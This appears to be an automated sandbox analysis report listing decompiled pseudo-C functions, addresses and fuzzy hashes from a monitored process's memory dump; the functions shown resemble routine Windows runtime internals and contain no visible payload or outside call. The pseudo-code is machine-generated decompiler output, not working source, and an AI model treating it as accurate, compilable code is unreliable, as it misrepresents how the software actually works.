0x050542e8
0x050542ee
0x050542f0
0x00000000
0x050542f2
0x050542f2
0x050542f4
0x050542f7
0x050542f9
0x05054300
0x05054300
0x050542f0
0x0505430e
0x0505431f

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7b477757ed68dcf2468c0ccd8f77357da9c770151f07fc8b42e6dd92aaf118
Instruction ID: 9f264b0787e0734c87cfe7cb9f75bf2207995a0635bdc5c3ddb73c41867b29fc
Opcode Fuzzy Hash: 4c7b477757ed68dcf2468c0ccd8f77357da9c770151f07fc8b42e6dd92aaf118
Instruction Fuzzy Hash: 6221AF30950601CFDB55DF64E140ADD7BFAFF41329B90C2AAD5099B2A0DB34D483CB40

Uniqueness

Uniqueness Score: -1.00%

Function 050446A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E050446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0500F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E04FFD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L04FE77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x050446b7
0x050446ba
0x050446c5
0x050446c8
0x050446d0
0x050446d4
0x050446e6
0x050446e9
0x050446f4
0x050446ff
0x05044705
0x05044706
0x0504470c
0x05044713
0x0504471b
0x05044723
0x05044725
0x050446d6
0x050446d9
0x050446db
0x050446db
0x05044732

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 747ee528f05a4456d126c69d0f5d0e17ee0079a46c1dd8500d1a635311549d6b
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 96112572504208BBDB159F5DE8809BEF7B9EF95304F1080AEF944C7350DA319D51D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 04FF2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04FF2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x50b848c != 0) {
					L04FEFAD0(0x50b8610);
					if( *0x50b848c == 0) {
						E04FEFA00(0x50b8610, _t19, _t27, 0x50b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04FF2581(0x50b8610, 0x4fa50a0, _t26, _t27, _t28);
						E04FEFA00(0x50b8610, 0x4fa50a0, _t27, 0x50b8610);
					}
				} else {
					L1:
					_t11 =  *0x50b8614; // 0x1
					if(_t11 == 0) {
						_t11 = E05004886(0x4fa1088, 1, 0x50b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04FF2581(0x50b8610, (_t11 << 4) + 0x4fa5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x04ff23b0
0x04ff23b6
0x04ff2409
0x04ff2415
0x05035ae9
0x00000000
0x04ff241b
0x04ff241b
0x04ff241d
0x04ff2427
0x04ff242e
0x04ff2430
0x04ff2430
0x04ff23b8
0x04ff23b8
0x04ff23b8
0x04ff23bf
0x04ff23fc
0x04ff23fc
0x04ff23c1
0x04ff23c3
0x04ff23d0
0x04ff23d8
0x04ff23d8
0x04ff23dc
0x04ff23de
0x04ff23e1
0x04ff23e1
0x04ff23ec

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5f88f7d42183692c2f81855d82272e5506bc30e37acd886309e97ea55b1722
Instruction ID: c93ec96e26c1dde9a93a2484d8d2b92c03dc227663c0bd2d8c981535bd30c768
Opcode Fuzzy Hash: 5a5f88f7d42183692c2f81855d82272e5506bc30e37acd886309e97ea55b1722
Instruction Fuzzy Hash: 58116BB274030067F720AA29AC85B6EB6DDEF90614F058456F702AB2B0DAB5F8039755

Uniqueness

Uniqueness Score: -1.00%

Function 050037F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E050037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04FE2280(_t6, 0x50b8550);
				}
				_t29 = E0500387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E04FDFFB0(0x50b8550, _t27, 0x50b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x050037fa
0x050037fc
0x05003805
0x05003808
0x05003808
0x05003814
0x05003818
0x05003846
0x05003848
0x0500384b
0x0500384b
0x05003852
0x00000000
0x05003854
0x05003856
0x00000000
0x00000000
0x05003863
0x00000000
0x05003863
0x0500381a
0x0500381a
0x0500381f
0x0500386e
0x0500386e
0x05003871
0x05003873
0x05003873
0x05003868
0x00000000
0x05003868
0x05003821
0x05003826
0x00000000
0x00000000
0x05003828
0x0500382a
0x05003841
0x00000000
0x05003841

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca1e531c35ee08d164c5cd152d6e29e0985c1c9dd62cd0ef73b371e74ca03b6
Instruction ID: cc8b7f1d6c52db653e847623ce47f5281eb21c0c73cbb0f120d5b2c72fc0eec4
Opcode Fuzzy Hash: bca1e531c35ee08d164c5cd152d6e29e0985c1c9dd62cd0ef73b371e74ca03b6
Instruction Fuzzy Hash: CD01DB729057105BE37B8B1AF940EBE7BE7EF85B50F1558E9E4458B251D730D801C790

Uniqueness

Uniqueness Score: -1.00%

Function 04FCC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E04FCC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x50bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E04FDEEF0(0x50b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0504F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E04FDEB70(_t29, 0x50b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0500B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0504F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x50b70c0; // 0x0
					while(_t38 != 0x50b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x50bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x04fcc96a
0x04fcc974
0x04fcc988
0x04fcc98a
0x05037c9d
0x05037c9f
0x05037ca4
0x05037cae
0x05037cf0
0x05037cf5
0x05037cfa
0x04fcc992
0x04fcc996
0x04fcc997
0x04fcc998
0x04fcc9a3
0x04fcc9a3
0x05037cb0
0x05037cb7
0x05037cbb
0x00000000
0x00000000
0x05037cbd
0x05037ce8
0x05037cc5
0x05037cc8
0x05037cca
0x05037cd0
0x05037cd6
0x05037cde
0x05037ce4
0x05037ce4
0x05037cd0
0x00000000
0x05037ce8
0x04fcc990
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a473c425fd8e70fb69388144ba35c98f3879ea12beae982b374ec1322b4b117
Instruction ID: d4094a23c975384eb566828887c78492c14ec26f224c90248904e70ef8e3e475
Opcode Fuzzy Hash: 1a473c425fd8e70fb69388144ba35c98f3879ea12beae982b374ec1322b4b117
Instruction Fuzzy Hash: 131125723207069BD750AF28EC86AAF7BEAFB84610B00063DF84587660DF20ED11DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04FF002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04FE7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04FE7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04FE7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04FE7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04ff0032
0x04ff0037
0x04ff0043
0x05034b3a
0x04ff0049
0x04ff0049
0x04ff0049
0x04ff004e
0x04ff0053
0x05034b48
0x05034b5a
0x05034b4a
0x05034b53
0x05034b53
0x05034b5f
0x00000000
0x05034b61
0x00000000
0x05034b61
0x04ff0059
0x04ff0059
0x04ff0060
0x05034b6f
0x05034b6f
0x04ff0069
0x05034b83
0x00000000
0x00000000
0x05034b90
0x05034b9b
0x05034b9b
0x05034ba4
0x00000000
0x00000000
0x05034baa
0x00000000
0x04ff006f
0x04ff006f
0x00000000
0x04ff006f
0x04ff0069

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: f0b51894b70f02837022c70a9ce686d1cc27f8f84be46addf0c4fdb6fc81ca87
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: F2110832705680CFEB229725ED49B3937D9FF41758F0900E0EE048B6A3E72AE842C250

Uniqueness

Uniqueness Score: -1.00%

Function 04FD766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04FD766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04FFF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04FFF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04FE4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x04fd7672
0x04fd767f
0x04fd7689
0x04fd76de
0x04fd76de
0x04fd768b
0x04fd7691
0x04fd7693
0x04fd7697
0x00000000
0x04fd7699
0x04fd76a8
0x00000000
0x04fd76aa
0x04fd76ad
0x04fd76b1
0x00000000
0x04fd76b3
0x04fd76b3
0x04fd76b5
0x04fd76ba
0x04fd76bc
0x04fd76bc
0x04fd76c0
0x00000000
0x04fd76c2
0x04fd76ce
0x04fd76ce
0x04fd76c0
0x04fd76b1
0x04fd76a8
0x04fd7697
0x04fd76d9

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: b33b23e19931fb249a31b3af2cc7f45108b28d219e90dfaddf95f61309ecdc7f
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: DC018432700119AFD720BE5ECC41E5B77EEEB84B60B280539B908CF250FA30ED0287A0

Uniqueness

Uniqueness Score: -1.00%

Function 0505C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0505C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05009910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E050095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E050095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E050095D0();
				return L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0505c458
0x0505c45d
0x0505c466
0x0505c468
0x0505c469
0x0505c46a
0x0505c46b
0x0505c46e
0x0505c46f
0x0505c471
0x0505c476
0x0505c476
0x0505c47c
0x0505c47e
0x0505c480
0x0505c480
0x0505c483
0x0505c484
0x0505c486
0x0505c488
0x0505c48f
0x0505c491
0x0505c493
0x0505c493
0x0505c48f
0x0505c498
0x0505c49e
0x0505c4ad
0x0505c4ad
0x0505c4b2
0x0505c4b4
0x0505c4cd

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: f6d998f15b06af5a6e2c3a8f2550058d31cd942ff3a54cc6a448f59a4bd16f8c
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: AF018072240605BFE626AF66DC84EABB7ADFB543A5F004525F514435A0CB31ACA1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04FC9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04FC9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x50b85ec;
				E04FE2280(_t48, 0x50b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04FDFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x50b538c; // 0x321ebd0
					if( *_t84 != 0x50b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x509f6e8);
						E0501D0E8(0x50b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E050988F5(_t80, _t85, 0x50b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x50b86c0; // 0x32007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x50b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04FE2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E050988F5(0x50b85ec, _t85, 0x50b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0500AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x50bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x50b84c0;
																			if(_t82 >=  *0x50b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05099063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04FC922A(_t99);
										_t64 = E04FE7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05098B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x50b86c0; // 0x32007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x50b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x50b86bc;
													_t87 = 0x50b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04FC9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x50b86c4;
												_t87 = 0x50b86c0;
												L27:
												E04FF9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0501D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x50b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x50b538c = _t51;
						goto L6;
					}
				}
			}

0x04fc9082
0x04fc9083
0x04fc9084
0x04fc9085
0x04fc9087
0x04fc9096
0x04fc9098
0x04fc9098
0x04fc909e
0x04fc90a8
0x04fc90e7
0x04fc90e7
0x04fc90aa
0x04fc90b0
0x04fc90b7
0x04fc90bd
0x04fc90dd
0x04fc90e6
0x04fc90bf
0x04fc90bf
0x04fc90c7
0x04fc90cf
0x04fc90f1
0x04fc90f2
0x04fc90f4
0x04fc90f5
0x04fc90f6
0x04fc90f7
0x04fc90f8
0x04fc90f9
0x04fc90fa
0x04fc90fb
0x04fc90fc
0x04fc90fd
0x04fc90fe
0x04fc90ff
0x04fc9100
0x04fc9102
0x04fc9107
0x04fc910c
0x04fc9110
0x04fc9113
0x04fc9115
0x04fc9136
0x04fc913f
0x04fc9143
0x050237e4
0x050237e4
0x04fc9117
0x04fc9117
0x04fc911d
0x00000000
0x04fc911f
0x04fc911f
0x04fc9125
0x00000000
0x04fc9127
0x04fc912d
0x04fc9130
0x04fc9134
0x04fc9158
0x04fc915d
0x04fc9161
0x04fc9168
0x05023715
0x04fc916e
0x04fc916e
0x04fc9175
0x04fc9177
0x04fc917e
0x04fc917f
0x04fc9182
0x04fc9182
0x04fc9187
0x04fc9187
0x04fc918a
0x04fc918d
0x04fc918f
0x04fc9192
0x04fc9195
0x04fc9198
0x04fc9198
0x04fc9198
0x04fc919a
0x00000000
0x00000000
0x0502371f
0x05023721
0x05023727
0x0502372f
0x05023733
0x05023735
0x05023738
0x0502373b
0x0502373d
0x05023740
0x00000000
0x05023746
0x05023746
0x05023749
0x00000000
0x0502374f
0x0502374f
0x05023751
0x05023757
0x05023759
0x0502375c
0x0502375c
0x0502375e
0x0502375e
0x05023761
0x05023764
0x00000000
0x00000000
0x05023766
0x05023768
0x050237a3
0x050237a3
0x050237a5
0x050237a7
0x050237ad
0x050237b0
0x050237b2
0x050237bc
0x050237c2
0x050237c2
0x050237b2
0x04fc9187
0x04fc9187
0x04fc918a
0x04fc918d
0x04fc918f
0x04fc9192
0x04fc9195
0x00000000
0x04fc9195
0x00000000
0x0502376a
0x0502376a
0x0502376a
0x0502376c
0x0502376c
0x0502376f
0x05023775
0x00000000
0x00000000
0x05023777
0x05023779
0x05023782
0x05023787
0x05023789
0x05023790
0x05023790
0x0502378b
0x0502378b
0x0502378b
0x05023792
0x05023795
0x00000000
0x05023795
0x00000000
0x05023779
0x05023798
0x00000000
0x05023798
0x00000000
0x05023768
0x0502379b
0x0502379b
0x05023751
0x05023749
0x00000000
0x05023740
0x04fc91a0
0x04fc91a3
0x04fc91a9
0x04fc91b0
0x00000000
0x04fc91b0
0x04fc9187
0x04fc91b4
0x04fc91b4
0x04fc91bb
0x04fc91c0
0x04fc91c5
0x04fc91c7
0x050237da
0x04fc91cd
0x04fc91cd
0x04fc91cd
0x04fc91d2
0x04fc91d5
0x04fc9239
0x04fc9239
0x04fc91d7
0x04fc91db
0x04fc91e1
0x04fc91e7
0x04fc91fd
0x04fc9203
0x04fc921e
0x04fc9223
0x00000000
0x04fc9205
0x04fc9205
0x04fc9208
0x04fc920c
0x04fc9214
0x04fc9214
0x04fc920c
0x04fc91e9
0x04fc91e9
0x04fc91ee
0x04fc91f3
0x04fc91f3
0x04fc91f3
0x04fc91e7
0x00000000
0x00000000
0x00000000
0x04fc9134
0x04fc9125
0x04fc911d
0x04fc914e
0x04fc90d1
0x04fc90d1
0x04fc90d3
0x04fc90d6
0x04fc90d8
0x00000000
0x04fc90d8
0x04fc90cf

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
